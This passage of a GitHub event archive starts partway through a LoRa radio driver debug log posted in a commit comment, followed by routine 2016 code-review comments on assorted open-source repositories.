Writing:  ##\tRegister 1:  9\r\n## Setting ON with maximum current supply ##\r\n\r\n\r\nStarting 'setLORA'\r\n## Writing:  ##\tRegister 1:  0\r\n## Writing:  ##\tRegister 1:  80\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 23:  FF\r\n## Writing:  ##\tRegister 1D:  72\r\n## Writing:  ##\tRegister 1E:  70\r\n## Writing:  ##\tRegister 26:  0\r\n## Reading:  ##\tRegister 1:  81\r\n## LoRa set with success ##\r\n\r\nSetting power ON: SUCCESS \r\n\r\nStarting 'setMode'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n\r\nStarting 'setCR'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1D:  72\r\n## Writing:  ##\tRegister 1D:  72\r\n## Reading:  ##\tRegister 1D:  72\r\n\r\nStarting 'isCR'\r\n## Coding Rate 1 has been successfully set ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\n\r\nStarting 'setSF'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1E:  70\r\n## Reading:  ##\tRegister 26:  0\r\n\r\nStarting 'getBW'\r\n## Reading:  ##\tRegister 1D:  72\r\n\r\nStarting 'isBW'\r\n## Bandwidth is 7 ##\r\n\r\n## Writing:  ##\tRegister 31:  3\r\n## Writing:  ##\tRegister 37:  A\r\n## Writing:  ##\tRegister 1E:  C3\r\n## Writing:  ##\tRegister 26:  C\r\n## Reading:  ##\tRegister 1E:  C3\r\n## Reading:  ##\tRegister 26:  C\r\n\r\nStarting 'getBW'\r\n## Reading:  ##\tRegister 1D:  72\r\n\r\nStarting 'isBW'\r\n## Bandwidth is 7 ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\n\r\nStarting 'isSF'\r\n## Spreading factor 12 has been successfully set ##\r\n\r\n\r\nStarting 'setBW'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1D:  72\r\n## Reading:  ##\tRegister 26:  C\r\n## Writing:  ##\tRegister 1D:  92\r\n## Writing:  ##\tRegister 26:  C\r\n## Reading:  ##\tRegister 1D:  92\r\n## Reading:  ##\tRegister 26:  C\r\n\r\nStarting 'isBW'\r\n## Bandwidth 9 has been successfully set ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1D:  92\r\n## Reading:  ##\tRegister 1E:  C3\r\n## Mode 4 configured with success ##\r\n## Writing:  ##\tRegister 1:  81\r\nSetting Mode: SUCCESS \r\n\r\nStarting 'setHeaderON'\r\n## Reading:  ##\tRegister 1D:  92\r\n## Writing:  ##\tRegister 1D:  92\r\n## Reading:  ##\tRegister 1D:  92\r\n## Header has been activated ##\r\n\r\nSetting Header ON: SUCCESS \r\n\r\nStarting 'setChannel'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 6:  6C\r\n## Writing:  ##\tRegister 7:  72\r\n## Writing:  ##\tRegister 8:  4F\r\n## Reading:  ##\tRegister 6:  6C\r\n## Reading:  ##\tRegister 7:  72\r\n## Reading:  ##\tRegister 8:  4F\r\n## Frequency channel 6C724F has been successfully set ##\r\n\r\n\r\nStarting 'isChannel'\r\n## Writing:  ##\tRegister 1:  81\r\nSetting Channel: SUCCESS \r\n\r\nStarting 'setCRC_ON'\r\n## Reading:  ##\tRegister 1E:  C3\r\n## Writing:  ##\tRegister 1E:  C7\r\n## Reading:  ##\tRegister 1E:  C7\r\n## CRC has been activated ##\r\n\r\nSetting CRC ON: SUCCESS \r\n\r\nStarting 'setPower'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 4D:  84\r\n## Writing:  ##\tRegister 4D:  87\r\n## Writing:  ##\tRegister 9:  FF\r\n## Reading:  ##\tRegister 9:  FF\r\n## Output power has been successfully set ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\nSetting Power: SUCCESS \r\n\r\nStarting 'setNodeAddress'\r\n## Reading:  ##\tRegister 1:  81\r\nSetting node address: SUCCESS \r\nsx1278 configured finished\r\n\r\n\r\nStarting 'sendPacketTimeout'\r\n\r\nStarting 'setPacket'\r\n## Reading:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 12:  FF\r\n## Writing:  ##\tRegister 1:  81\r\n## LoRa flags cleared ##\r\n\r\nStarting 'setDestination'\r\n## Destination 4 successfully set ##\r\n## Source 2 successfully set ##\r\n## Packet number 0 successfully set ##\r\n\r\n\r\nStarting 'setPayload'\r\n\r\nStarting 'truncPayload'\r\n\r\nStarting 'setPacketLength'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 22:  4B\r\n## Reading:  ##\tRegister 22:  4B\r\n## Packet length 75 has been successfully set ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister E:  0\r\n## Writing:  ##\tRegister D:  0\r\n## Writing:  ##\tRegister 0:  4\r\n## Writing:  ##\tRegister 0:  2\r\n## Writing:  ##\tRegister 0:  0\r\n## Writing:  ##\tRegister 0:  4B\r\n## Writing:  ##\tRegister 0:  50\r\n## Writing:  ##\tRegister 0:  61\r\n## Writing:  ##\tRegister 0:  63\r\n## Writing:  ##\tRegister 0:  6B\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  31\r\n## Writing:  ##\tRegister 0:  2C\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  77\r\n## Writing:  ##\tRegister 0:  61\r\n## Writing:  ##\tRegister 0:  6E\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  69\r\n## Writing:  ##\tRegister 0:  6E\r\n## Writing:  ##\tRegister 0:  67\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  6F\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  73\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  69\r\n## Writing:  ##\tRegister 0:  66\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  72\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  63\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  69\r\n## Writing:  ##\tRegister 0:  76\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  64\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  70\r\n## Writing:  ##\tRegister 0:  61\r\n## Writing:  ##\tRegister 0:  63\r\n## Writing:  ##\tRegister 0:  6B\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  69\r\n## Writing:  ##\tRegister 0:  73\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  68\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  73\r\n## Writing:  ##\tRegister 0:  61\r\n## Writing:  ##\tRegister 0:  6D\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  61\r\n## Writing:  ##\tRegister 0:  73\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  73\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  6E\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  70\r\n## Writing:  ##\tRegister 0:  61\r\n## Writing:  ##\tRegister 0:  63\r\n## Writing:  ##\tRegister 0:  6B\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  0\r\n## Packet set and written in FIFO ##\r\n## Packet to send: 4|2|0|4B|50|61|63|6B|65|74|20|31|2C|20|77|61|6E|74|69|6E|67|20|74|6F|20|73|65|65|20|69|66|20|72|65|63|65|69|76|65|64|20|70|61|63|6B|65|74|20|69|73|20|74|68|65|20|73|61|6D|65|20|61|73|20|73|65|6E|74|20|70|61|63|6B|65|74|0 ##\r\n## Writing:  ##\tRegister 1:  81\r\n\r\nStarting 'setTimeout'\r\nTimeout to send/receive is: 1780\r\n\r\nStarting 'sendWithTimeout'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 12:  FF\r\n## Writing:  ##\tRegister 1:  81\r\n## LoRa flags cleared ##\r\n## Writing:  ##\tRegister 1:  83\r\n## Reading:  ##\tRegister 12:  FF\r\n## Packet successfully sent ##\r\n\r\n## Reading:  ##\tRegister 1:  FF\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 12:  FF\r\n## Writing:  ##\tRegister 1:  FF\r\n## LoRa flags cleared ##\r\nPacket sent, state 0\r\n\r\nStarting 'sendPacketTimeout'\r\n\r\nStarting 'setPacket'\r\n## Reading:  ##\tRegister 1:  81\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 12:  FF\r\n## Writing:  ##\tRegister 1:  81\r\n## LoRa flags cleared ##\r\n\r\nStarting 'setDestination'\r\n## Destination 0 successfully set ##\r\n## Source 2 successfully set ##\r\n## Packet number 1 successfully set ##\r\n\r\n\r\nStarting 'setPayload'\r\n\r\nStarting 'truncPayload'\r\n\r\nStarting 'setPacketLength'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 22:  1D\r\n## Reading:  ##\tRegister 22:  1D\r\n## Packet length 29 has been successfully set ##\r\n\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister E:  0\r\n## Writing:  ##\tRegister D:  0\r\n## Writing:  ##\tRegister 0:  0\r\n## Writing:  ##\tRegister 0:  2\r\n## Writing:  ##\tRegister 0:  1\r\n## Writing:  ##\tRegister 0:  1D\r\n## Writing:  ##\tRegister 0:  50\r\n## Writing:  ##\tRegister 0:  61\r\n## Writing:  ##\tRegister 0:  63\r\n## Writing:  ##\tRegister 0:  6B\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  32\r\n## Writing:  ##\tRegister 0:  2C\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  62\r\n## Writing:  ##\tRegister 0:  72\r\n## Writing:  ##\tRegister 0:  6F\r\n## Writing:  ##\tRegister 0:  61\r\n## Writing:  ##\tRegister 0:  64\r\n## Writing:  ##\tRegister 0:  63\r\n## Writing:  ##\tRegister 0:  61\r\n## Writing:  ##\tRegister 0:  73\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  20\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  65\r\n## Writing:  ##\tRegister 0:  73\r\n## Writing:  ##\tRegister 0:  74\r\n## Writing:  ##\tRegister 0:  0\r\n## Packet set and written in FIFO ##\r\n## Packet to send: 0|2|1|1D|50|61|63|6B|65|74|20|32|2C|20|62|72|6F|61|64|63|61|73|74|20|74|65|73|74|0 ##\r\n## Writing:  ##\tRegister 1:  81\r\n\r\nStarting 'setTimeout'\r\nTimeout to send/receive is: 1464\r\n\r\nStarting 'sendWithTimeout'\r\n## Reading:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 12:  FF\r\n## Writing:  ##\tRegister 1:  81\r\n## LoRa flags cleared ##\r\n## Writing:  ##\tRegister 1:  83\r\n## Reading:  ##\tRegister 12:  90\r\n## Reading:  ##\tRegister 12:  84\r\n## Reading:  ##\tRegister 12:  84\r\n## Reading:  ##\tRegister 12:  A2\r\n## Reading:  ##\tRegister 12:  A2\r\n## Reading:  ##\tRegister 12:  90\r\n## Reading:  ##\tRegister 12:  84\r\n## Reading:  ##\tRegister 12:  84\r\n## Reading:  ##\tRegister 12:  88\r\n## Packet successfully sent ##\r\n\r\n## Reading:  ##\tRegister 1:  88\r\n## Writing:  ##\tRegister 1:  81\r\n## Writing:  ##\tRegister 12:  FF\r\n## Writing:  ##\tRegister 1:  88\r\n## LoRa flags cleared ##\r\nPacket sent, state 0\r\n\r"}},"created_at":"2016-09-05T18:25:30Z"}
{"id":"4517989690","type":"CommitCommentEvent","actor":{"login":"ipapapa"},"repo":{"name":"diegopacheco/ndbench"},"payload":{"comment":{"id":18902914,"position":42,"line":86,"path":"ndbench-dyno-plugins/src/main/java/com/netflix/ndbench/plugin/dyno/DynoJedisPlugin.java","commit_id":"84b77c5db38cd3f50fd706fce47d6de4a18edc41","created_at":"2016-09-05T18:25:49Z","updated_at":"2016-09-05T18:25:49Z","body":"what if somebody does not provide that? Would it work? In other words, yet it may work with a local Dynomite but we want to make sure that it does not break the remote Dynomite. If it does break the remote Dynomite, then we can have another plug in with this."}},"created_at":"2016-09-05T18:25:49Z"}
{"id":"4517990085","type":"CommitCommentEvent","actor":{"login":"SunsMan"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18902915,"position":84,"line":84,"path":"index.html","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-05T18:26:00Z","updated_at":"2016-09-05T18:26:00Z","body":"Именование - 'filtred' - уже отфильтрованный, а не фильтруемый как у тебя. можно заменить на фильтрацию в самом контроллере, а вывести другой временный массив. Хотя фильтры и предназначены для того чтобы их использовать в разметке. Посмотрю основной код, докомментирую"}},"created_at":"2016-09-05T18:26:00Z"}
{"id":"4517990587","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"JakimOFF/lemon-school"},"payload":{"comment":{"id":18902916,"position":null,"line":null,"path":null,"commit_id":"5aa9c31fc21e11e604eff482d3f6d2b8b161d2c2","created_at":"2016-09-05T18:26:14Z","updated_at":"2016-09-05T18:26:14Z","body":"картинки потерял"}},"created_at":"2016-09-05T18:26:14Z"}
{"id":"4517991451","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18902919,"position":null,"line":null,"path":null,"commit_id":"aa9141462e303efd8fafd88f2de436e2b1844f69","created_at":"2016-09-05T18:26:35Z","updated_at":"2016-09-05T18:26:35Z","body":"We deferred before (when you wrote it) because clicking a link would jump to \"chunk\" (the first entry).\r\nI thought I could remove it but I guess not.\r\n"}},"created_at":"2016-09-05T18:26:35Z"}
{"id":"4517992944","type":"CommitCommentEvent","actor":{"login":"SunsMan"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18902924,"position":85,"line":85,"path":"index.html","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-05T18:27:16Z","updated_at":"2016-09-05T18:27:16Z","body":"Можно использовать '::' для одностороннего дайндинга"}},"created_at":"2016-09-05T18:27:16Z"}
{"id":"4517993171","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18902926,"position":null,"line":null,"path":null,"commit_id":"b144ad78834c562b1995f1942cc36b51db55ba6b","created_at":"2016-09-05T18:27:23Z","updated_at":"2016-09-05T18:27:23Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#BxkRmNgISOahmUohiav0BA"}},"created_at":"2016-09-05T18:27:23Z"}
{"id":"4517993330","type":"CommitCommentEvent","actor":{"login":"crantila"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18902928,"position":7,"line":148,"path":"vis/tests/test_new_ngram.py","commit_id":"f603f28550324fa42e15c5589a920b480934777b","created_at":"2016-09-05T18:27:28Z","updated_at":"2016-09-05T18:27:28Z","body":"One of the most annoying things for me is vague, incorrect, or misleading error messages, so this is something I test often. It's especially helpful for situations like this, where the method under test might raise the same warning/error for different reasons because we verify that the `RuntimeWarning` comes from the specific line of code we want to test."}},"created_at":"2016-09-05T18:27:28Z"}
{"id":"4517993865","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902929,"position":44,"line":54,"path":"docs/content/guide/security.ngdoc","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T18:27:34Z","updated_at":"2016-09-05T18:27:34Z","body":"The expressions being filtered can only be attacked if the template is undermined.\r\n\r\nThe difference with `orderBy` is that we can actually pass a string as the `predicate` to `orderBy` and we then evaluate it using `$parse`.\r\nThe other parameters of `orderBy` can only be a function or a boolean so those cannot be attacked.\r\n\r\nSimilarly `comparator` in the `filter` filter can only be a boolean or a function - we do not parse it as an expression ever."}},"created_at":"2016-09-05T18:27:34Z"}
{"id":"4517994901","type":"CommitCommentEvent","actor":{"login":"crantila"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18902933,"position":6,"line":125,"path":"vis/analyzers/indexers/new_ngram.py","commit_id":"f603f28550324fa42e15c5589a920b480934777b","created_at":"2016-09-05T18:28:02Z","updated_at":"2016-09-05T18:28:02Z","body":"Could you please add an explanation to the docstring that's right here?"}},"created_at":"2016-09-05T18:28:02Z"}
{"id":"4517995435","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"yleteigner/exabgp"},"payload":{"comment":{"id":18902937,"position":47,"line":47,"path":"lib/exabgp/bgp/message/update/attribute/linkstate.py","commit_id":"f395cdc1bf71c0c5166df1edc18c2b3d55680e15","created_at":"2016-09-05T18:28:15Z","updated_at":"2016-09-05T18:28:15Z","body":"I woud add a dictionnary with a lamda function for each type of TLVS\r\nso you can do something like:\r\n```\r\nenc = self.bytes[tlv_type] + self.encoder[tlv_type](val)\r\n```"}},"created_at":"2016-09-05T18:28:15Z"}
{"id":"4517996510","type":"CommitCommentEvent","actor":{"login":"ZenLulz"},"repo":{"name":"ZenLulz/MemorySharp"},"payload":{"comment":{"id":18902941,"position":null,"line":null,"path":null,"commit_id":"fd49a2069f37d9f7e4ce8c66256ec401c5254170","created_at":"2016-09-05T18:28:42Z","updated_at":"2016-09-05T18:28:42Z","body":"@CoolOppo Many thanks :+1: "}},"created_at":"2016-09-05T18:28:42Z"}
{"id":"4517998081","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18902946,"position":null,"line":null,"path":null,"commit_id":"cd8a6643bab6d75bdfba210220c59c065b772db6","created_at":"2016-09-05T18:29:24Z","updated_at":"2016-09-05T18:29:24Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#EexNNUOORGyCskg_OGcfCA"}},"created_at":"2016-09-05T18:29:24Z"}
{"id":"4518000515","type":"CommitCommentEvent","actor":{"login":"maziminke"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18902951,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-05T18:30:20Z","updated_at":"2016-09-05T18:30:20Z","body":"Guys, seriously, why do we make such adjustments at a feature frozen version. This breaks backward compatibility of any custom template using that placeholder.\r\nhttps://bugs.limesurvey.org/view.php?id=11623"}},"created_at":"2016-09-05T18:30:20Z"}
{"id":"4518000966","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18902952,"position":null,"line":null,"path":null,"commit_id":"2b659e1aa3d15bbc704e9f5d2ce35de91163d2a4","created_at":"2016-09-05T18:30:29Z","updated_at":"2016-09-05T18:30:29Z","body":"Consider using a scheme like this for releases instead of random shit: https://github.com/xdevs23/Cornowser/releases"}},"created_at":"2016-09-05T18:30:29Z"}
{"id":"4518004090","type":"CommitCommentEvent","actor":{"login":"kkaefer"},"repo":{"name":"mapbox/mapbox-gl-native"},"payload":{"comment":{"id":18902958,"position":14,"line":78,"path":"cmake/test-files.cmake","commit_id":"df3b44531e1c2a95edd2a035d3744f34ebb8d0e9","created_at":"2016-09-05T18:31:40Z","updated_at":"2016-09-05T18:31:40Z","body":"Heads up that you should use `./scripts/generate-test-files.sh` to update this auto-generated list."}},"created_at":"2016-09-05T18:31:40Z"}
{"id":"4518004711","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"yleteigner/exabgp"},"payload":{"comment":{"id":18902959,"position":94,"line":94,"path":"lib/exabgp/bgp/message/update/attribute/linkstate.py","commit_id":"f395cdc1bf71c0c5166df1edc18c2b3d55680e15","created_at":"2016-09-05T18:31:57Z","updated_at":"2016-09-05T18:31:57Z","body":"``\r\nself._packed == other._packed ???\r\n``"}},"created_at":"2016-09-05T18:31:57Z"}
{"id":"4518007795","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902964,"position":null,"line":null,"path":null,"commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T18:33:17Z","updated_at":"2016-09-05T18:33:17Z","body":"I think I have dealt with your comments @gkalpak via https://github.com/angular/angular.js/commit/fdc3de807aa42c775160004245e320013c673db5"}},"created_at":"2016-09-05T18:33:17Z"}
{"id":"4518009579","type":"CommitCommentEvent","actor":{"login":"bmc08gt"},"repo":{"name":"lg-devs/android_kernel_lge_msm8996"},"payload":{"comment":{"id":18902969,"position":48,"line":263,"path":"arch/arm64/boot/dts/lge/dsi-panel-lgd-lg4946-dualmipi-qhd-cmd.dtsi","commit_id":"a7b23883113d6cff63b53b4ed0218c698079f018","created_at":"2016-09-05T18:34:06Z","updated_at":"2016-09-05T18:34:06Z","body":"indentation!!!!"}},"created_at":"2016-09-05T18:34:06Z"}
{"id":"4518009949","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"yleteigner/exabgp"},"payload":{"comment":{"id":18902970,"position":113,"line":113,"path":"lib/exabgp/bgp/message/update/attribute/linkstate.py","commit_id":"f395cdc1bf71c0c5166df1edc18c2b3d55680e15","created_at":"2016-09-05T18:34:15Z","updated_at":"2016-09-05T18:34:15Z","body":"I do not believe this unpack would work, as it would be passed to the __init__ of LinkState which expects a list of string to be parsed it seems."}},"created_at":"2016-09-05T18:34:15Z"}
{"id":"4518009961","type":"CommitCommentEvent","actor":{"login":"m3th4mp"},"repo":{"name":"m3th4mp/BitchX-Theme-for-Textual-IRC-Client"},"payload":{"comment":{"id":18902971,"position":null,"line":null,"path":null,"commit_id":"126dbc641e145f07c8c086dca2469513e85d6110","created_at":"2016-09-05T18:34:15Z","updated_at":"2016-09-05T18:34:15Z","body":"Cleaned up /whois results. It's starting to come together nicely. "}},"created_at":"2016-09-05T18:34:15Z"}
{"id":"4518010865","type":"CommitCommentEvent","actor":{"login":"adrianknight89"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":18902975,"position":null,"line":null,"path":null,"commit_id":"d5ad18b3e9947157ab073eb0e5c0a30e7f039c62","created_at":"2016-09-05T18:34:40Z","updated_at":"2016-09-05T18:34:40Z","body":"@samhouts @jassmith This commit introduced this bug for me: https://bugzilla.xamarin.com/show_bug.cgi?id=43993"}},"created_at":"2016-09-05T18:34:40Z"}
{"id":"4518011718","type":"CommitCommentEvent","actor":{"login":"crantila"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18902976,"position":5,"line":10,"path":"vis/models/indexed_piece.py","commit_id":"d2244c52795e3fc09e835f04ba325a344d41d8be","created_at":"2016-09-05T18:35:05Z","updated_at":"2016-09-05T18:35:05Z","body":"Here's a bit of nitpicking. This file should have three copyright statements:\r\n\r\n> Copyright 2013 Jamie Klassen\r\n> Copyright 2013, 2014 Christopher Antila\r\n> Copyright 2016 Alexander Morgan\r\n\r\nWhen you edit a file, you have a copyright for every year in which a release was finished that you participated in. You didn't edit the file until a 2016 release. I haven't edited the file since a 2014 release.\r\n\r\nIt's a pain, but you never know when it will be important!"}},"created_at":"2016-09-05T18:35:05Z"}
{"id":"4518014655","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18902984,"position":54,"line":1770,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T18:36:29Z","updated_at":"2016-09-05T18:36:29Z","body":"I'm pretty certain these should all be %s."}},"created_at":"2016-09-05T18:36:29Z"}
{"id":"4518015215","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18902985,"position":8,"line":9,"path":"app/controllers/feeds_controller.rb","commit_id":"659465dea287f0f4c528e45a98e5ac96026d4dca","created_at":"2016-09-05T18:36:44Z","updated_at":"2016-09-05T18:36:44Z","body":"I guess it would be okay to have the feeds have a reference to the user they belong to, and  have the user's feeds, visible only to that specific user. Also, to not allow modifications of the feeds and products that the user does not own. \r\n"}},"created_at":"2016-09-05T18:36:44Z"}
{"id":"4518016003","type":"CommitCommentEvent","actor":{"login":"PetrZamorin"},"repo":{"name":"PetrZamorin/test"},"payload":{"comment":{"id":18902989,"position":null,"line":null,"path":null,"commit_id":"7007427c8230c8409c05c4313c475172284fd269","created_at":"2016-09-05T18:37:05Z","updated_at":"2016-09-05T18:37:05Z","body":"лорлорловыаловаорлыова"}},"created_at":"2016-09-05T18:37:05Z"}
{"id":"4518016328","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18902990,"position":null,"line":null,"path":null,"commit_id":"333a3e05f6d84213b1bd9473d0be048253bc2d5f","created_at":"2016-09-05T18:37:14Z","updated_at":"2016-09-05T18:37:14Z","body":"Thanks for noticing!"}},"created_at":"2016-09-05T18:37:14Z"}
{"id":"4518018816","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18903001,"position":6,"line":31,"path":"NEWS","commit_id":"17967ecda153a397df91e30733d3375f033096bd","created_at":"2016-09-05T18:38:18Z","updated_at":"2016-09-05T18:38:18Z","body":"This news entry says the bundled libzip is 1.1.2, but according the [Git log it is 1.0.1](https://github.com/php/php-src/blob/PHP-7.0/ext/zip/lib/zip.h). :-/"}},"created_at":"2016-09-05T18:38:18Z"}
{"id":"4518019688","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"yleteigner/exabgp"},"payload":{"comment":{"id":18903006,"position":60,"line":60,"path":"lib/exabgp/bgp/message/update/nlri/ls_unicast.py","commit_id":"f395cdc1bf71c0c5166df1edc18c2b3d55680e15","created_at":"2016-09-05T18:38:42Z","updated_at":"2016-09-05T18:38:42Z","body":"All the pack() calls are using CPU so it would be good to pre-calculate the strings, store them and just append the variable part of the data."}},"created_at":"2016-09-05T18:38:42Z"}
{"id":"4518020280","type":"CommitCommentEvent","actor":{"login":"lolosef"},"repo":{"name":"luben/zstd-jni"},"payload":{"comment":{"id":18903009,"position":503,"line":503,"path":"src/main/native/fse.c","commit_id":"3dfe760cbb8cc46da3268af6aa73dce6014298ef","created_at":"2016-09-05T18:38:58Z","updated_at":"2016-09-05T18:38:58Z","body":" paddle.trainer.PyDataProvider2"}},"created_at":"2016-09-05T18:38:58Z"}
{"id":"4518020812","type":"CommitCommentEvent","actor":{"login":"BramGruneir"},"repo":{"name":"eisenstatdavid/cockroach"},"payload":{"comment":{"id":18903010,"position":78,"line":1794,"path":"storage/replica_command.go","commit_id":"2107aff38e2411726c7f6262242800fccea43bb1","created_at":"2016-09-05T18:39:13Z","updated_at":"2016-09-05T18:39:13Z","body":"move this up before the `if err` I think.  And that err doesn't stop the rest from proceeding, and it should."}},"created_at":"2016-09-05T18:39:13Z"}
{"id":"4518021131","type":"CommitCommentEvent","actor":{"login":"nomeata"},"repo":{"name":"google/codeworld"},"payload":{"comment":{"id":18903012,"position":null,"line":null,"path":null,"commit_id":"0d8d554be065b2111999a7f7862013cc7070b193","created_at":"2016-09-05T18:39:21Z","updated_at":"2016-09-05T18:39:21Z","body":"This is a nice idea. Shortly after this change, [brittany](https://github.com/lspitzner/brittany), a competitor to `hindent` came up. I am a bit fan of vertical alignment, so I wanted to nudge to you have a look at brittany, and if you happen to like that more, maybe use it :-)"}},"created_at":"2016-09-05T18:39:21Z"}
